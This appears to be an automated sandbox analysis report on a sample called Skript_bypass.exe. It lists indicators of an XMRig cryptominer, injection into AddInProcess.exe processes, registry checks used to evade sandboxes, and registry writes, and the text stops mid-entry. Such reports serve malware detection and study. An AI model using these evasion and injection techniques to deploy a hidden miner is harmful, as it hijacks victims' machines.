Analysis
-
max time kernel
886s -
max time network
903s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2022 20:28
Static task
static1
URLScan task
urlscan1
General
Malware Config
Signatures
-
XMRig Miner payload 58 IoCs
Processes:
resource yara_rule behavioral1/memory/4988-200-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4988-201-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/4988-202-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4988-203-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4988-205-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4988-207-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1380-209-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1380-210-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1380-211-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1380-213-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1380-214-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1380-216-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4648-219-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4648-218-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/4648-220-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4648-222-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4648-223-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4648-225-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4312-227-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/4312-228-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4312-229-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4312-231-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4312-233-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2416-235-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/2416-236-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2416-237-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2416-239-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2416-241-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1920-243-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1920-244-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1920-245-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1920-247-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1920-249-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2312-251-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/2312-252-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2312-253-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2312-255-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2312-257-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/548-260-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/548-261-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/548-262-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/548-264-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/548-266-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3960-268-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/3960-269-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3960-272-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3960-274-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4628-276-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/4628-280-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4628-282-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1728-284-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1728-288-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1728-290-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4464-292-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/4464-296-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4464-298-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4512-300-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/4512-304-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
Skript_bypass.exeSkript_bypass.exeSkript_bypass.exepid process 1920 Skript_bypass.exe 2180 Skript_bypass.exe 1804 Skript_bypass.exe -
Loads dropped DLL 2 IoCs
Processes:
taskmgr.exepid process 1220 taskmgr.exe 1220 taskmgr.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 13 IoCs
Processes:
Skript_bypass.exedescription pid process target process PID 2180 set thread context of 4988 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 1380 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 4648 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 4312 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 2416 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 1920 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 2312 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 548 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 3960 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 4628 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 1728 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 4464 2180 Skript_bypass.exe AddInProcess.exe PID 2180 set thread context of 4512 2180 Skript_bypass.exe AddInProcess.exe -
Checks SCSI registry key(s) 3 TTPs 42 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exetaskmgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exetaskmgr.exetaskmgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
chrome.exeSearchApp.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchApp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchApp.exe -
Modifies registry class 54 IoCs
Processes:
SearchApp.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "7400" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "129" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2644" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "855" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "855" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "4083" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "2869" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "173" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "7400" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "173" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "9903" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "4083" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "820" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "7400" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2869" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "129" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "140" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "6675" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "6675" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "4083" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "2979" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2655" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "140" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "820" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "2655" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2655" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "2644" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "855" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "140" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "173" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2644" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2869" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "6675" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "129" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local 